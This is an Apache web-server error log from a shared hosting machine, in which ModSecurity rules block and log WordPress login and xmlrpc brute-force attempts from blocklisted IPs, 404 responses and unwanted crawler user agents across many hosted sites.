[Tue May 26 17:27:37.327763 2026] [security2:error] [pid 882219:tid 882282] [remote 88.198.165.116:42306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWKsZ8tTkZcqimiXcQSNQAA3j4"]
[Tue May 26 17:27:38.035877 2026] [security2:error] [pid 882219:tid 882231] [remote 141.95.202.18:48574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWKsZ8tTkZcqimiXcQSRQAAhgs"]
[Tue May 26 17:27:38.523801 2026] [security2:error] [pid 882219:tid 882471] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKsp8tTkZcqimiXcQSSwAAAP8"]
[Tue May 26 17:27:38.643065 2026] [security2:error] [pid 882219:tid 882406] [client 203.194.101.7:61067] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKsp8tTkZcqimiXcQSYAAAAL4"]
[Tue May 26 17:27:38.643218 2026] [security2:error] [pid 882219:tid 882406] [client 203.194.101.7:61067] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKsp8tTkZcqimiXcQSYAAAAL4"]
[Tue May 26 17:27:38.704428 2026] [security2:error] [pid 882219:tid 882464] [client 43.172.194.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWKsp8tTkZcqimiXcQSXwAAAPg"]
[Tue May 26 17:27:40.828495 2026] [security2:error] [pid 882219:tid 882370] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKtJ8tTkZcqimiXcQSkgAAAJo"]
[Tue May 26 17:27:42.434765 2026] [security2:error] [pid 882219:tid 882350] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKtp8tTkZcqimiXcQStgAAAIY"]
[Tue May 26 17:27:42.484925 2026] [security2:error] [pid 882219:tid 882354] [client 123.17.141.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKtp8tTkZcqimiXcQSuQAAAIo"]
[Tue May 26 17:27:43.716953 2026] [core:crit] [pid 882219:tid 882362] (13)Permission denied: [client 40.77.167.17:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:27:45.401569 2026] [security2:error] [pid 882219:tid 882440] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKuJ8tTkZcqimiXcQTCQAAAOA"]
[Tue May 26 17:27:46.072677 2026] [security2:error] [pid 882219:tid 882434] [client 223.235.98.214:32506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKup8tTkZcqimiXcQTOwAAANo"]
[Tue May 26 17:27:46.072852 2026] [security2:error] [pid 882219:tid 882434] [client 223.235.98.214:32506] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKup8tTkZcqimiXcQTOwAAANo"]
[Tue May 26 17:27:47.181480 2026] [security2:error] [pid 882219:tid 882466] [client 104.28.38.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWKup8tTkZcqimiXcQTgQAAAPo"]
[Tue May 26 17:27:47.790440 2026] [security2:error] [pid 882219:tid 882394] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKu58tTkZcqimiXcQTngAAALI"]
[Tue May 26 17:27:47.865973 2026] [security2:error] [pid 882219:tid 882339] [remote 178.104.164.71:51082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWKu58tTkZcqimiXcQTtgAA4Hc"]
[Tue May 26 17:27:48.960985 2026] [security2:error] [pid 882219:tid 882398] [client 203.194.101.7:61395] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKvJ8tTkZcqimiXcQUEgAAALY"]
[Tue May 26 17:27:48.961169 2026] [security2:error] [pid 882219:tid 882398] [client 203.194.101.7:61395] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKvJ8tTkZcqimiXcQUEgAAALY"]
[Tue May 26 17:27:49.190174 2026] [security2:error] [pid 882219:tid 882340] [remote 103.91.67.202:40846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWKvZ8tTkZcqimiXcQUFAAAkXg"]
[Tue May 26 17:27:49.592001 2026] [security2:error] [pid 882219:tid 882359] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKvZ8tTkZcqimiXcQUHwAAAI8"]
[Tue May 26 17:27:52.552343 2026] [security2:error] [pid 882219:tid 882356] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKwJ8tTkZcqimiXcQUvgAAAIw"]
[Tue May 26 17:27:54.263112 2026] [security2:error] [pid 882219:tid 882459] [client 74.7.228.17:49750] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "webmail.midrivermarina.com"] [uri "/___proxy_subdomain_webmail/robots.txt"] [unique_id "ahWKwp8tTkZcqimiXcQVJQAAAPM"]
[Tue May 26 17:27:54.831144 2026] [security2:error] [pid 882219:tid 882381] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKwp8tTkZcqimiXcQVMAAAAKU"]
[Tue May 26 17:27:57.007379 2026] [security2:error] [pid 882219:tid 882421] [client 223.235.98.214:25949] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKxJ8tTkZcqimiXcQVxgAAAM0"]
[Tue May 26 17:27:57.007518 2026] [security2:error] [pid 882219:tid 882421] [client 223.235.98.214:25949] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKxJ8tTkZcqimiXcQVxgAAAM0"]
[Tue May 26 17:27:57.119045 2026] [security2:error] [pid 882219:tid 882384] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKxJ8tTkZcqimiXcQVtwAAAKg"]
[Tue May 26 17:27:58.945057 2026] [security2:error] [pid 882219:tid 882249] [remote 31.24.44.107:37126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWKxp8tTkZcqimiXcQWMgAAkx0"]
[Tue May 26 17:27:59.175231 2026] [security2:error] [pid 882219:tid 882450] [client 203.194.101.7:61711] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKx58tTkZcqimiXcQWTgAAAOo"]
[Tue May 26 17:27:59.176039 2026] [security2:error] [pid 882219:tid 882450] [client 203.194.101.7:61711] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKx58tTkZcqimiXcQWTgAAAOo"]
[Tue May 26 17:27:59.244065 2026] [security2:error] [pid 882219:tid 882427] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKxp8tTkZcqimiXcQWOAAAANM"]
[Tue May 26 17:28:01.030108 2026] [security2:error] [pid 882219:tid 882350] [client 209.163.116.253:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWKyJ8tTkZcqimiXcQWugAAAIY"], referer: https://www.anujtradingco.com/
[Tue May 26 17:28:01.820419 2026] [security2:error] [pid 882219:tid 882413] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKyZ8tTkZcqimiXcQW1QAAAMU"]
[Tue May 26 17:28:02.061749 2026] [security2:error] [pid 882219:tid 882439] [client 173.239.254.133:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWKxp8tTkZcqimiXcQWQAAA3zA"]
[Tue May 26 17:28:03.888515 2026] [security2:error] [pid 882219:tid 882462] [client 171.104.131.225:31285] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "worldwidecourier.co.in"] [uri "/wp-comments-post.php"] [unique_id "ahWKy58tTkZcqimiXcQXDAAAAPY"]
[Tue May 26 17:28:04.061282 2026] [http2:info] [pid 891273:tid 891273] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 17:28:04.581359 2026] [security2:error] [pid 891273:tid 891412] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKzMDEzZ8z3jtDm82LwAAAAAk"]
[Tue May 26 17:28:05.500904 2026] [security2:error] [pid 891273:tid 891466] [client 209.163.116.253:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWKzcDEzZ8z3jtDm82L3QAAAD8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1230522&moderation-hash=3045c8d525c2db48bd4eb670ab172339
[Tue May 26 17:28:06.476686 2026] [security2:error] [pid 891273:tid 891498] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKzsDEzZ8z3jtDm82L7QAAAF8"]
[Tue May 26 17:28:07.246135 2026] [security2:error] [pid 891273:tid 891419] [client 208.91.198.85:31368] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "freshmindsolutions.com"] [uri "/wp-content/uploads/2023/03/logo-fms-1.jpg"] [unique_id "ahWKz8DEzZ8z3jtDm82MDQAAABA"]
[Tue May 26 17:28:07.657706 2026] [security2:error] [pid 891273:tid 891414] [client 223.235.98.214:20759] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKz8DEzZ8z3jtDm82MGgAAAAs"]
[Tue May 26 17:28:07.657820 2026] [security2:error] [pid 891273:tid 891414] [client 223.235.98.214:20759] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKz8DEzZ8z3jtDm82MGgAAAAs"]
[Tue May 26 17:28:08.253301 2026] [security2:error] [pid 891273:tid 891466] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKz8DEzZ8z3jtDm82MJAAAAD8"]
[Tue May 26 17:28:08.872123 2026] [security2:error] [pid 891273:tid 891494] [client 113.174.18.145:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK0MDEzZ8z3jtDm82MMwAAAFs"]
[Tue May 26 17:28:09.549033 2026] [security2:error] [pid 891273:tid 891487] [client 203.194.101.7:62001] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWK0cDEzZ8z3jtDm82MQgAAAFQ"]
[Tue May 26 17:28:09.549225 2026] [security2:error] [pid 891273:tid 891487] [client 203.194.101.7:62001] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWK0cDEzZ8z3jtDm82MQgAAAFQ"]
[Tue May 26 17:28:10.037904 2026] [security2:error] [pid 891273:tid 891282] [remote 88.198.165.116:53798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWK0cDEzZ8z3jtDm82MTgAACQg"]
[Tue May 26 17:28:10.986448 2026] [security2:error] [pid 891273:tid 891477] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK0sDEzZ8z3jtDm82MYgAAAEo"]
[Tue May 26 17:28:12.025140 2026] [security2:error] [pid 891273:tid 891445] [client 114.119.156.119:60169] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWK1MDEzZ8z3jtDm82MkAAAACo"], referer: http://eco-green.com.mx/w2.php?JGNS=NOU188662332&g=15&m=3
[Tue May 26 17:28:12.626170 2026] [security2:error] [pid 891273:tid 891295] [remote 198.38.81.14:60784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.81.38.198.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahWK1MDEzZ8z3jtDm82MlQAAWBU"]
[Tue May 26 17:28:13.392395 2026] [security2:error] [pid 891273:tid 891489] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK1MDEzZ8z3jtDm82MowAAAFY"]
[Tue May 26 17:28:14.725918 2026] [security2:error] [pid 891273:tid 891409] [client 62.60.130.182:55306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-login.php"] [unique_id "ahWK1sDEzZ8z3jtDm82M0AAAAAY"], referer: https://duckduckgo.com/
[Tue May 26 17:28:15.224158 2026] [security2:error] [pid 891273:tid 891480] [client 62.60.130.182:55550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-login.php"] [unique_id "ahWK18DEzZ8z3jtDm82M4wAAAE0"], referer: https://www.google.com/
[Tue May 26 17:28:16.001564 2026] [security2:error] [pid 891273:tid 891515] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK18DEzZ8z3jtDm82M7gAAAHA"]
[Tue May 26 17:28:17.606056 2026] [security2:error] [pid 891273:tid 891486] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK2cDEzZ8z3jtDm82NIQAAAFM"]
[Tue May 26 17:28:17.942325 2026] [security2:error] [pid 891273:tid 891414] [client 85.208.96.194:19338] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-15-19/list/"] [unique_id "ahWK2cDEzZ8z3jtDm82NQQAAAAs"]
[Tue May 26 17:28:17.942465 2026] [security2:error] [pid 891273:tid 891414] [client 85.208.96.194:19338] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-15-19/list/"] [unique_id "ahWK2cDEzZ8z3jtDm82NQQAAAAs"]
[Tue May 26 17:28:18.246357 2026] [security2:error] [pid 891273:tid 891521] [client 223.235.98.214:20932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWK2sDEzZ8z3jtDm82NRQAAAHY"]
[Tue May 26 17:28:18.246512 2026] [security2:error] [pid 891273:tid 891521] [client 223.235.98.214:20932] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWK2sDEzZ8z3jtDm82NRQAAAHY"]
[Tue May 26 17:28:19.749507 2026] [security2:error] [pid 891273:tid 891484] [client 203.194.101.7:62300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWK28DEzZ8z3jtDm82NewAAAFE"]
[Tue May 26 17:28:19.749667 2026] [security2:error] [pid 891273:tid 891484] [client 203.194.101.7:62300] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWK28DEzZ8z3jtDm82NewAAAFE"]
[Tue May 26 17:28:19.998199 2026] [security2:error] [pid 891273:tid 891442] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK28DEzZ8z3jtDm82NeAAAACc"]
[Tue May 26 17:28:22.794707 2026] [security2:error] [pid 891273:tid 891477] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK3sDEzZ8z3jtDm82N8AAAAEo"]
[Tue May 26 17:28:25.161524 2026] [security2:error] [pid 891273:tid 891481] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK4MDEzZ8z3jtDm82OcgAAAE4"]
[Tue May 26 17:28:27.018236 2026] [security2:error] [pid 891273:tid 891512] [client 52.167.144.176:20040] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWK4cDEzZ8z3jtDm82OjgAAAG0"]
[Tue May 26 17:28:27.025761 2026] [security2:error] [pid 891273:tid 891312] [remote 123.30.233.13:46348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWK4sDEzZ8z3jtDm82O2gAAaSY"]
[Tue May 26 17:28:27.539824 2026] [security2:error] [pid 891273:tid 891425] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK48DEzZ8z3jtDm82O6QAAABY"]
